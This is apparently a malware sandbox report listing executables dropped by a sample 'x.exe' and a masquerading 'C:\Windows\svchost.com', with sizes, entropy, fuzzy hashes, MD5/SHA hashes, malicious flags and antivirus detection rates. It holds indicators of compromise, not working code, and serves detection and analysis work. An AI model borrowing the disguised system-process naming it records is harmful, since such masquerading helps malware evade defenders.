• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 100%
• Antivirus: Virustotal, Detection: 89%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):299136
                                      Entropy (8bit):6.790537251287294
                                      Encrypted:false
                                      SSDEEP:6144:PuGkXCs7zYA9xiNFiVg7s/uDoeBvhI7W6w9:xkXCs/YAh/elvhI7Wd
                                      MD5:57150329C07A1CCA1C715687BBD681A0
                                      SHA1:EA1805323441B728107A98C5C88EB1609116F70E
                                      SHA-256:AFB4A253B3CFEFB7FA8C8AAB7FE10060AF5A33C10147EDBA4501C5089F407023
                                      SHA-512:2BD0008D28BDBBBDB0F6A8D01121FFCF9A6AD18147110F100D1EB3CD7B93EC3481F8D0358E427F94D53F01764B246C54FC49F57CFDBAB1831672218197DFC444
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):437888
                                      Entropy (8bit):6.42435194722595
                                      Encrypted:false
                                      SSDEEP:12288:xXNKdHVnfiMB7yIL+5IyoiYv5jPaeTmJWIvDxT9ULX8PCM:hKiBLZ05jNTmJWExixM
                                      MD5:E96B5A5F7432CF95AC667CC32CAB7CE1
                                      SHA1:F5729409A0AD909360DD9938FE05681E8C98BEA7
                                      SHA-256:22345B680E235E582820160A73A5221A98550D7947DC1F22FE768C51788B3614
                                      SHA-512:BF03F48889EA86C4C39B32B32760FE57293D85C5E6A88D3695CF4D7F7AB23B3F4ED07588987619B084AFFB51A61B3C7404E2D8177A29EC4AF343FCBD66F7C560
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):343328
                                      Entropy (8bit):6.643174471027498
                                      Encrypted:false
                                      SSDEEP:6144:PutkTpB8HHvBjruphfgesnAhAOQp2EwckjQx+m8zhPLlZp3:GklinJruphfg26p2Ewix+m8Nln3
                                      MD5:C6DCB652B36FD0F69EF1C6C28C3F3D3E
                                      SHA1:B9FA38B704D6BDDA1E203422207E09D2FB49C216
                                      SHA-256:A2D68D17A3E61E41CD6E9389058D6A36036BEC91AFD4CF6A2F587FAF0CDCDD5B
                                      SHA-512:1B184AC17FDD6F28956F619CD772697EEA6684C70B4E74222BD75C58ACFF62C1BF66D9AFB840A9735A0BACD3792405E063701AA29C909EFB5F3B6DF5AF284FB3
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):443680
                                      Entropy (8bit):6.396943856678141
                                      Encrypted:false
                                      SSDEEP:12288:z3gaHC2zUM2WJoROZVXk8hbodzbaw8x0Cx+wnx:zx5k8hb0Haw+x5x
                                      MD5:689EC8C9ABDBA5399058B31A494353E7
                                      SHA1:2940C3D9852341884ED269B06804C0383F9A6056
                                      SHA-256:B168963DD38A08EE00E540180FF0BB2480E72D6439C6F3E386BFDEACCC725F95
                                      SHA-512:AE28934023D46D5D36A894F31A0A2232DF9D968B20D7176BCD37058C13FE9B1BA41387CEBBE824BC6FAFF0ECB35354C1A69C585BC39A4468B713B9F458CCB107
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):203552
                                      Entropy (8bit):6.1311659126541285
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC6aKavT/DvbEvK9aobNI2B+Nl4jz+b0atWH1TmFtotpcat8iKdlVST31Oa:Pu6aK2h9H/B+rEtiPC
                                      MD5:5C85C6CF32D2443AE5A7E4FAD8CB7CCF
                                      SHA1:D23CB4A5961CD7B7C4DA100EBE98E5A4CB8B2FCF
                                      SHA-256:4EBA2A6D96466D63B206E0760B4E9319D26B4458A8F030460DDE896AAF227682
                                      SHA-512:FBC3D48FCF80DBAA328DCDF326638C57CEF445A31FA269AF6D47BFC03E112BCD0143721C78F041A3D1C7AEAF44BE135484B33D170AA1EA550CFE5AB15242F694
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):149792
                                      Entropy (8bit):6.503976503009816
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC/4vzT+PjZpsB+2h+EOXkMxJ7Rfp8K172YPrp:PulpsB+09zMH7cCxPd
                                      MD5:EAAD727FE492030433EBADE57325EA69
                                      SHA1:6008DE3C0DD2203E737A68ADB562A81DE1BD4349
                                      SHA-256:8294521F6F0C2936F76C92743BF193937619C13FC0CFCBE2DA1238605D07F79B
                                      SHA-512:803E85A412536591F05DC3C6065B84919B11460AD08DD8F5833E47C9FFA00E1D33DE6092658D219C819220B867CEFFFBED8BAF822E372E95CBD8D48AD9351DE7
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):227104
                                      Entropy (8bit):6.2330769171298925
                                      Encrypted:false
                                      SSDEEP:6144:PuKWt9h8QlLISZWVRohcq7dvni3F8QrBA/:by9hdFIdRoGUxi35rBU
                                      MD5:19E917EB830D0429C0E2E8F64114212B
                                      SHA1:5351AA18D019E6ED9123460431B4B28A0187A065
                                      SHA-256:6133D3AF6F4C30C1337C63B71947056FB3A46E2A269EB4F2E996E53DD8E95754
                                      SHA-512:A5CFFE837ADAC6B05C3D4F413C9461BD368A7CAFC3142DD5472BE292F1D17FB74571BC05FC8204F0781138016D76085DB843EEFC787033984FB42546F8DF24D3
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):264480
                                      Entropy (8bit):6.638998317491867
                                      Encrypted:false
                                      SSDEEP:6144:PumwCtJmRqyFmB6AOKmiMGwIAfx+iQ+FfFyLgG1da6edo:tw6JmRI6Bitwpx+iQafFykG1da6edo
                                      MD5:CC6410226CC9A5A311864C905A41F69D
                                      SHA1:C2E9C75DC6382238B2D7697576C5BB47A09AA1EF
                                      SHA-256:6118343C2990A8414501F08A6FC70E2888E8CDC193054E0410D5B5FF3EF63898
                                      SHA-512:DAE7626F1BFADCE4E9108CC20FBF84D5F86D1E9EBF7AA58B6386613C52718AF2C91ABFDD539F87297DBC2A5FB486619F4048FC831B96DC4AD924C61785AFA6AB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):149792
                                      Entropy (8bit):6.504334063798769
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCz4qR8vSZksB+2hdqecER5AhC48S1m2YPrZ:Pu5ksB+0YlEXAe6QPt
                                      MD5:3782AA85B64BBBFD331D8170B86BCB0A
                                      SHA1:2FE109D8CDDC028910DC40DF789B90D8997B1557
                                      SHA-256:390F98A5B31D514641DFB13DDBCA0C071F4D8FD4F094C25859C98A672572B0C1
                                      SHA-512:D1DEBFF36BB931F544B48D611E0D513FFE7BA5A36650932F007B2C6198BDF8E4E1F253D0CCF24A25AF9066C5278EEEDA568EBA6FEE20B404377D4BB1A68253DF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1631792
                                      Entropy (8bit):7.974979800124763
                                      Encrypted:false
                                      SSDEEP:24576:TR1kyOX3l3PScicR9iK5vS8dU+0BeId7JfroHKExAuRBAHToF4rMTgZYhA5QR5sN:DkVX3lfrFfR0BecCqKBs+4o8YhAKi
                                      MD5:3D04EE3450C730CFDA46C28B33176F2E
                                      SHA1:DB5E017288EE49E5CC7486A5E4ADF2865D052451
                                      SHA-256:2DF36D4FB0D0CD7C14D58AD80CA0749A3D827FF6DB0C2E4D51587D9832FDC5DE
                                      SHA-512:8336B3A1CFAA2320BAF875950C8D83232184E8ECEA21F3B4E230BB15E2D93614B000D6458BBCB0A7D1F226764528C8E4D9A28CA826A712EFBCF9AAE4AA154A73
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1631792
                                      Entropy (8bit):7.974979800124763
                                      Encrypted:false
                                      SSDEEP:24576:TR1kyOX3l3PScicR9iK5vS8dU+0BeId7JfroHKExAuRBAHToF4rMTgZYhA5QR5sN:DkVX3lfrFfR0BecCqKBs+4o8YhAKi
                                      MD5:3D04EE3450C730CFDA46C28B33176F2E
                                      SHA1:DB5E017288EE49E5CC7486A5E4ADF2865D052451
                                      SHA-256:2DF36D4FB0D0CD7C14D58AD80CA0749A3D827FF6DB0C2E4D51587D9832FDC5DE
                                      SHA-512:8336B3A1CFAA2320BAF875950C8D83232184E8ECEA21F3B4E230BB15E2D93614B000D6458BBCB0A7D1F226764528C8E4D9A28CA826A712EFBCF9AAE4AA154A73
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):299136
                                      Entropy (8bit):6.7881128883409
                                      Encrypted:false
                                      SSDEEP:6144:PuGXLYbH0QQchx73BeFStIhEWDoZvynCMj+TwW:xXEbH0j4x7R6SvyCMqn
                                      MD5:BB745A9E59BFDC3FED3D6ACC5EB1969E
                                      SHA1:B569EF5567BF533C49F4C59441D1881726DEA540
                                      SHA-256:5C257F423AFD510D6EE9EAB80273CC673995F966932466C9AD74EB2AA613A892
                                      SHA-512:B43198FC36F9DECB3767E6888B632093550394DF5D5826540A0BBDAE711931F595B398CE59C5F4676C1FDA7953C0702D57CC98D3E18309DEA517C536AB63CCCD
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):135808
                                      Entropy (8bit):6.38873877226639
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCGrmKJGyeVK7qjh3rmKPNbS7cZPxyqPEoCW/ids8nBs+s8nK:zr8WDrCGqzyutjZqMNbSgxbFrj8m
                                      MD5:3DFB05D09AB50A01B467398603BEADB5
                                      SHA1:D8A8AD789717B3E83608AE510FBFF096861DC271
                                      SHA-256:A4844081CA91828B55104253A954E3B073D6E762D66A4EFA8F22AF9C4D995833
                                      SHA-512:D6FD943FA97432F80CD81621D5186D7D6CB8F7622604278BE31CFEEBF98A46A9007E3C71F6E392B9B41563CA5BC6BD9B86AAA3D6A4CF1B148179D7692F7A9A99
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):299136
                                      Entropy (8bit):6.790537251287294
                                      Encrypted:false
                                      SSDEEP:6144:PuGkXCs7zYA9xiNFiVg7s/uDoeBvhI7W6w9:xkXCs/YAh/elvhI7Wd
                                      MD5:57150329C07A1CCA1C715687BBD681A0
                                      SHA1:EA1805323441B728107A98C5C88EB1609116F70E
                                      SHA-256:AFB4A253B3CFEFB7FA8C8AAB7FE10060AF5A33C10147EDBA4501C5089F407023
                                      SHA-512:2BD0008D28BDBBBDB0F6A8D01121FFCF9A6AD18147110F100D1EB3CD7B93EC3481F8D0358E427F94D53F01764B246C54FC49F57CFDBAB1831672218197DFC444
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):437888
                                      Entropy (8bit):6.42435194722595
                                      Encrypted:false
                                      SSDEEP:12288:xXNKdHVnfiMB7yIL+5IyoiYv5jPaeTmJWIvDxT9ULX8PCM:hKiBLZ05jNTmJWExixM
                                      MD5:E96B5A5F7432CF95AC667CC32CAB7CE1
                                      SHA1:F5729409A0AD909360DD9938FE05681E8C98BEA7
                                      SHA-256:22345B680E235E582820160A73A5221A98550D7947DC1F22FE768C51788B3614
                                      SHA-512:BF03F48889EA86C4C39B32B32760FE57293D85C5E6A88D3695CF4D7F7AB23B3F4ED07588987619B084AFFB51A61B3C7404E2D8177A29EC4AF343FCBD66F7C560
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):163456
                                      Entropy (8bit):6.2758220261788
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCm446dewltB2mNd/HOrveW1dexk834fRZ5Nyc:Pum446d7T/H4X
                                      MD5:51117D59430CF4C0EA72319AD8930BED
                                      SHA1:0A7AB6E54B1F62D9FEE7F48A594AFD0E3F7ED846
                                      SHA-256:CE688EDA6A1F081C10E862422F2C13F24797F21D2DA248E85C0CC81D96BF3010
                                      SHA-512:E05E6DA3D9728F5E04F5F4D2BF9B875BEA8CCD287BA207B2469D83F49BB6AA759C608B29A107D33BF8460F71840EADAB34CB1924DA3EE8F9E5DE741FB45045BF
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):127104
                                      Entropy (8bit):6.059161475634893
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCds8nBs5s8nBskEsz2zy77hPxIAbBsnzA3QDkrDW8Kq5ns8w:zr8WDrCwUkEsqzy7pxI8BszFJqkb
                                      MD5:EF3C7B1D99C49F679F1DE40119454E82
                                      SHA1:E3869B9D17411A1DFB49630E8E9D0A379CCA1599
                                      SHA-256:4ECF5FCDD95ABA50DF6137D45EDB89467D33A31347525B422AA2A9B36809233B
                                      SHA-512:71D00F7B07E909CE5C54FBD85DDAAC2752B6B2AE2ED76EDADB4AA07AB1F7BDF25ECD77CB1742EEBAFBFA98087A4582879D4A2D277965D3D39F9E6ADEBA9170F5
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):223360
                                      Entropy (8bit):6.084515656741608
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC+ySSyyXC2BZC5vHa2L8jv+UII6qS2AroAxYN35gwxcPXtxdTsVcCXFzlb:PuuSyMZOy406qS2AroAxnw6f9JCXN1
                                      MD5:278E935C540125EB737FF60459E06954
                                      SHA1:3F2F868109AB1BE159D75FE1FCB78D5AB0F39A29
                                      SHA-256:7DD8239708026320DC7B738BF5B1F90117475EBF88BE8DA06B99E6A3E860596F
                                      SHA-512:21E3181E34FCC0D304F5A8EEFA0B92B676DF815BE984792D034FEB61E3189D73020AD5B6D82A5DF2434CD97AB2D1F48AD223B7007695F0673A2ECA8803D2C825
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):203264
                                      Entropy (8bit):6.625450286768847
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC6wl0hzyfN7T34oshWGrAUdaz2w9Lf0M/RHym:Pu3iFIf34hcUsz225/
                                      MD5:241380ED43DD374CF6415E50B83CD0BD
                                      SHA1:5F4F79F4DBEB1201DFC3D3A83BB1D5400D11F045
                                      SHA-256:D3CA30B886E1F07EC6AC3989C091EBD5E97F1196D9BD554A2546EF3B4DF61EA4
                                      SHA-512:D4BF86E17996171B67900847372EFECDC41E7F87621F831FD882E8DEAE49F5A45B218E375AE2347E862C438C11906E2CC67E062A0BC2D1265C968789FA8F68E4
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):209912
                                      Entropy (8bit):6.335658991643739
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCUfSoD7sDZ7/E2jijQvZ2ha5ZxXHyz7weLSMqpmmtj:PuUfSoD7q/fji2SUKz7VHwmmtj
                                      MD5:0DB388DA73178AB846638C787D1DD91E
                                      SHA1:64D79EC424EF95DE05D484C3BDC446642552879B
                                      SHA-256:E71DDCCD4996D121D5C7901A367E024266727C4C713635A25B74EB0C132CD59F
                                      SHA-512:94288DB9B2615FDA0BD27A46EEDBDB3F8FE3E8C2B2985D2B69244B47A7369AD5F357D060DE52FD4C5E9746CF7A3343417A77476A153F49058D8F8C2E61EBFB11
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):209912
                                      Entropy (8bit):6.335658991643739
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCUfSoD7sDZ7/E2jijQvZ2ha5ZxXHyz7weLSMqpmmtj:PuUfSoD7q/fji2SUKz7VHwmmtj
                                      MD5:0DB388DA73178AB846638C787D1DD91E
                                      SHA1:64D79EC424EF95DE05D484C3BDC446642552879B
                                      SHA-256:E71DDCCD4996D121D5C7901A367E024266727C4C713635A25B74EB0C132CD59F
                                      SHA-512:94288DB9B2615FDA0BD27A46EEDBDB3F8FE3E8C2B2985D2B69244B47A7369AD5F357D060DE52FD4C5E9746CF7A3343417A77476A153F49058D8F8C2E61EBFB11
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):264144
                                      Entropy (8bit):5.859978790158535
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC2PEGT3EB2e1aWGNU6ITL85x0HRerzJ0YF6OYLy0PPDq29BA+7891:Pu2PEC0QjWGNU6ITL1H0zvjkBA+7891
                                      MD5:B2A0013F6770F98CD5D22419C506CD32
                                      SHA1:D1B9E2EBBE6255A386AFE69A9523B7D2BE1E05EA
                                      SHA-256:87C62BFBF6609662EE24C1B9FD1AB2CF261F68E5F1402CB7E2F6755023A29841
                                      SHA-512:3302A6D3AB1DC7CB725F4E0DA1A82ECEC7207C7CDF2050410625AFF4E51C17B3A38DB8630ED34E111344C66BC603C3939A46E52A3EE6E1EF282DB1E93E61036F
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):430680
                                      Entropy (8bit):6.625803592345581
                                      Encrypted:false
                                      SSDEEP:6144:Puvmmt0fSoD7ZAOhPiURg/4KAaxZTTlvIfaUcuI4hWxBP9SGO0zyqEL:Pmt0LDdOUO42ZdocuI4kxBgGONqEL
                                      MD5:2463BF0CFD3790EACDB9BFCCA012D2D2
                                      SHA1:B3EAED3711C1A369A3359BD6ECEF26DDB824B9D2
                                      SHA-256:FD879B6629EBDFB190FAB80B29DEA52997A75FC44845749552815DA18EA07532
                                      SHA-512:494FAECC19D7B59548E04CA1CDDE618B9636ED3FC159D526ECC9E4F05DBDF0A96F3C0ABECD4B90BCC1ED7ACA57A9E38400CDCF06C19936D3407D3D5A10B9CC6B
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4473576
                                      Entropy (8bit):6.5697251244545924
                                      Encrypted:false
                                      SSDEEP:98304:9kkCqyDEY7+o3OBvfGVY+40yajyS+9s/pLOq:9kkCqaE68eV+0y8E6L1
                                      MD5:A0E84CEDA4163F189BE5349FD432B1CB
                                      SHA1:204335080CD8BA8D46E52DFB29F1461D7BF84CA1
                                      SHA-256:9A8C97840B4745ABA6BE44CAE7DE9EC0E7960AE31E52DFDE4ACCB1C24B6C4DA7
                                      SHA-512:BE941C507F9A607087E96CDBA94358F4882BA231CC08E6AAE8480301A5FF82940630134F9DB780B9527F43DD83ABE5D4868759854D2517A6D6A87A26903FCC9F
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4316096
                                      Entropy (8bit):3.9254629343592016
                                      Encrypted:false
                                      SSDEEP:98304:jPNLniBaEJhRELqS/rhwov59SRZ5Vb9sybbsK+0rnsQ:TNLniBPJhRELqS/rhb59SRZ5Vb9sybb9
                                      MD5:AB9C308CB62C689AEC4171AF74B99607
                                      SHA1:2AFBE3B52505B17653C30E8C51A8A434BB83433D
                                      SHA-256:5B23BCB1EB5124A1FA7160014A7BE5A546CAFE00AE7FFFCFB19C237552281499
                                      SHA-512:688D62C8CC8B7E699D379FE5FDA6DC808787E11C369C5CBDFA3559E2B61B607C0AF252232775BA04C2AD082C21DBA2224E6C34E131381EDD52EF0C2539C70484
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):94600
                                      Entropy (8bit):6.430762305801649
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCuELjOzHKd1XI/etzCJQx0cxnIO/IOmOe:zr8WDrCuE/OTKXI/etG8ICILJ
                                      MD5:29065F4177E1DFFC20CF409E15644D07
                                      SHA1:2A506101526624DF3C693E3F9501E7FD0332A5F3
                                      SHA-256:A572BFF875EA91F7324C87C4966ED38AE29C87A3B999E9EEDCF82730921F1AEA
                                      SHA-512:611B4D7DF2C4D2B37E6C152B0416A047166B78C999B1C7A6B39D11FE73CB80BA55F4822B9503642CB289730D90A608FA08DC909A845F77A8A13C967689A3C00B
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):142968
                                      Entropy (8bit):6.217019140684561
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCcvpz3ktxGvpzvy5ZWGalHFmMTK0KRTS8bOzxOxqjQ+P04wv:zr8WDrCKToATzvmN0KRm8bOzFr8WDrC
                                      MD5:27468177388C31213F942B92669A9CFB
                                      SHA1:550FF26E9634EEB3207CD34B90DED088004D7262
                                      SHA-256:B620C258E90FE86AB06EBAC3A21ABA853C89E75BA348106CEBAB6D4C50EDC039
                                      SHA-512:20EFA6E9B5792B85AC143957E50CF5493431A8A3EFCEBC06C6E77AE3D26D1BAFF68AD461E839D44312DAD6391AB83923DC0208FA304D6B9D21BBF1744F01E9D7
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):455760
                                      Entropy (8bit):5.9112226204404
                                      Encrypted:false
                                      SSDEEP:6144:Pu1wACThwS0vn9IdRsLGEJTdPA6lDfZNAGVx:iwACThwSSn2dRANtlF3j
                                      MD5:88735BCB5AD8B4C4EB20F420E2F3B73E
                                      SHA1:4B45EBC185EAB621105A0EABA9695AC709DC68A9
                                      SHA-256:2610D839A8603AA6425B0D0419998CDA3887CA444C0226A3546A436971B5EB53
                                      SHA-512:C21A7385053E5B20873BEBE7813B13F12BFF1AE4A4BEFA63F6AE9CC28C81E0B378D67DE541CE97E13065608018AA55F9CB337176C4739E7F7BC8879462241AD3
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):225704
                                      Entropy (8bit):6.245888252421863
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCNLqB8edYkIrv6TXRw9xwqazULDjkAJZo0RAjUIqXfkRC:PuRjilq8OPwRzso6AQ5yC
                                      MD5:58FCC2021F6669D332B12379F34E6ABA
                                      SHA1:C261CF77942748482EA6423B2816071BAC404855
                                      SHA-256:099D81B808C4A1507092974E4C79187470FC4D5BC1049DE99B7D87D68FFD8A8D
                                      SHA-512:2637E583059CA760EACB66649519751191FC96FD3589DE8E17D0AC73C957D9256A50105D03727D19A1193DFB61FF1450AD65DEEA8692EF2D947051D85062E8C1
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):84928
                                      Entropy (8bit):6.484542699354416
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCh67wZClMML07MiapFmPRHyzMwzobtM+zf:zr8WDrCh67wZClMMQ7MiawHyzMwsL
                                      MD5:6E3355F8734F6DA5FAC15DF47A197B0F
                                      SHA1:C933D5E414F6594D61E56FEC641373E33AD3C3ED
                                      SHA-256:052C62D09235DDD70A3C52C7071D20711F2D4F1F7F653AEA54FB023EC2626B12
                                      SHA-512:1B108643E2DF6476B167E233B7A3E249A2BCB89006B3C87FEEB90FC96214B52E0BC466C010AE03ED6BECF18864F96B0D5EED6F4720A1CDA70829B4631D3917FD
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):83816
                                      Entropy (8bit):6.536836051910162
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrC+0s7wZClMML072apFmPcnGzLHyxz5pOEtmwxz5E:zr8WDrC+t7wZClMMQ72ahnGzextQyxtE
                                      MD5:D713C72B72F2554BC5F57573AD79C596
                                      SHA1:82F518A57C167F1CFE80D7D43ED28084C2D57933
                                      SHA-256:22CC2A1543DC27CC8F1925ACB173E34141C4FF9E1A012C572E932BB6FD91B4C1
                                      SHA-512:D0DCB842E46D1F372DBFF6CF1D3DEF6BA5461770400DE2BB7DFD9CB0DB35E80DC721C779E2CF8F852BA9B9EA9E5937D6C4DA31989D399107B6075C6771928486
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):233832
                                      Entropy (8bit):6.440520521123031
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCqW32GhNvMQ/58sl2U2Gszlz4SNBZCgMWku:Puf2GhN0lsdspzPgg1
                                      MD5:605C2C89F9F2A47F991EF737877F2FB6
                                      SHA1:14E316AFBCA1D6590C6105B7BF76A72339C3ADEF
                                      SHA-256:E96F113D251169D2B4DB5F51BFBF5F20609702F7B0BEA5FEA55CD4DF71A70682
                                      SHA-512:506E962224D44478E14FDA6A093E861E225745E36A3B32B7BC98E337F1B492A3664AD84497ECBFB427A967D3CA0390CED92D11FD9E8EF3D7887D2D9415243D5B
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):502632
                                      Entropy (8bit):6.717621615137878
                                      Encrypted:false
                                      SSDEEP:6144:PuyWDxGH79J2VX5gEpvm7JA8I6BHAlSpFG/+Ls3ze30xB7zq2zs:0MxCvm7JK6JAB/6N30xpI
